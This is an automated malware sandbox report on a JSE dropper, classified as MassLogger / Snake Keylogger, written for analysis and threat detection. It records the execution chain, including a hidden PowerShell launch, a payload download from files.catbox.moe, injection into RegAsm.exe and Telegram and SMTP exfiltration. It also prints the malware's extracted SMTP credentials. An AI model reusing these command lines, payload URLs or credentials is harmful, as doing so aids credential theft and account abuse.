
Windows Analysis Report
1C24TDP_000000029.jse

Overview

General Information

Sample name: 1C24TDP_000000029.jse
Analysis ID: 1586897
MD5: ffb57c052a985d3e7b43502f4e07376c
SHA1: fd80160aa4ab95c55fd0002b4705816c6c7fe1fd
SHA256: 2861bc7808cb4308c951499b8709ce15c8dd56e551183e5d75adf1a7b825fe07
Tags: jse, user-threatinte1

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 7660 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9FB7455B1C6CB563FF7E58F422F3BC6E)
        • RegAsm.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"EXfil Mode": "SMTP", "From": "mtb.food@phobinh.com.vn", "Password": "danh@PB289", "Server": "mail.phobinh.com.vn", "To": "office@handtool.com.vn", "Port": 587}
Source | Rule | Description | Author | Strings
00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xefb7:$a1: get_encryptedPassword
  • 0xf2df:$a2: get_encryptedUsername
  • 0xed52:$a3: get_timePasswordChanged
  • 0xee73:$a4: get_passwordField
  • 0xefcd:$a5: set_encryptedPassword
  • 0x10929:$a7: get_logins
  • 0x105da:$a8: GetOutlookPasswords
  • 0x103cc:$a9: StartKeylogger
  • 0x10879:$a10: KeyLoggerEventArgs
  • 0x10429:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author | Strings
5.2.RegAsm.exe.400000.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
5.2.RegAsm.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.RegAsm.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
5.2.RegAsm.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0xf1b7:$a1: get_encryptedPassword
  • 0xf4df:$a2: get_encryptedUsername
  • 0xef52:$a3: get_timePasswordChanged
  • 0xf073:$a4: get_passwordField
  • 0xf1cd:$a5: set_encryptedPassword
  • 0x10b29:$a7: get_logins
  • 0x107da:$a8: GetOutlookPasswords
  • 0x105cc:$a9: StartKeylogger
  • 0x10a79:$a10: KeyLoggerEventArgs
  • 0x10629:$a11: KeyLoggerEventArgsEventHandler
5.2.RegAsm.exe.400000.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x13971:$a4: \Orbitum\User Data\Default\Login Data
  • 0x14769:$a5: \Kometa\User Data\Default\Login Data

Networking

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 123.30.244.30, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7408, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", ProcessId: 7408, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7408, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", ProcessId: 7408, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7408, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 7500, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-09T18:33:11.533811+0100 | 2018856 | 1 | A Network Trojan was detected | 108.181.20.35 | 443 | 192.168.2.4 | 49730 | TCP
2025-01-09T18:33:19.821960+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 132.226.247.73 | 80 | TCP
2025-01-09T18:33:26.440288+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 132.226.247.73 | 80 | TCP
2025-01-09T18:33:11.356574+0100 | 2827578 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 108.181.20.35 | 443 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: 5.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "mtb.food@phobinh.com.vn", "Password": "danh@PB289", "Server": "mail.phobinh.com.vn", "To": "office@handtool.com.vn", "Port": 587}
Source: 1C24TDP_000000029.jse | ReversingLabs: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\x.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2

Software Vulnerabilities

Source: 1C24TDP_000000029.jse | Argument value: ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true']
Source: 1C24TDP_000000029.jse | Argument value: ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"']
Source: 1C24TDP_000000029.jse | Argument value: ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']
Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 02AA5782h | 5_2_02AA5358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 02AA51B9h | 5_2_02AA4F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 02AA5782h | 5_2_02AA56AF

Networking

Source: Network traffic | Suricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49730 -> 108.181.20.35:443
Source: Network traffic | Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49730
Source: C:\Windows\System32\wscript.exe | Network Connect: 108.181.20.35 443
Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 123.30.244.30:587
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 108.181.20.35
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 132.226.247.73:80
Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 123.30.244.30:587
Source: global traffic | HTTP traffic detected: GET /jqxrkk.ps1 HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: files.catbox.moe | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /jqxrkk.ps1 HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: files.catbox.moe | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: files.catbox.moe
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: mail.phobinh.com.vn
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comd
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
Source: x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgd
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.phobinh.com.vn
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.phobinh.com.vnd
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail24430.maychuemail.com
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail24430.maychuemail.comd
Source: powershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0-
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe
Source: wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/
Source: wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/9
Source: wscript.exe, 00000000.00000003.1836877929.000001E210DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835743221.000001E210DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1834430753.000001E210E1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835043827.000001E212B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712270321.000001E212B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836567182.000001E210DBA000.00000004.00000020.00020000.00000000.sdmp, 1C24TDP_000000029.jse | String found in binary or memory: https://files.catbox.moe/jqxrkk.ps1
Source: wscript.exe, 00000000.00000003.1712270321.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1839074641.000001E212B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712341931.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835122772.000001E212B4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/jqxrkk.ps1u
Source: wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/u
Source: wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe;
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2

                System Summary

Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
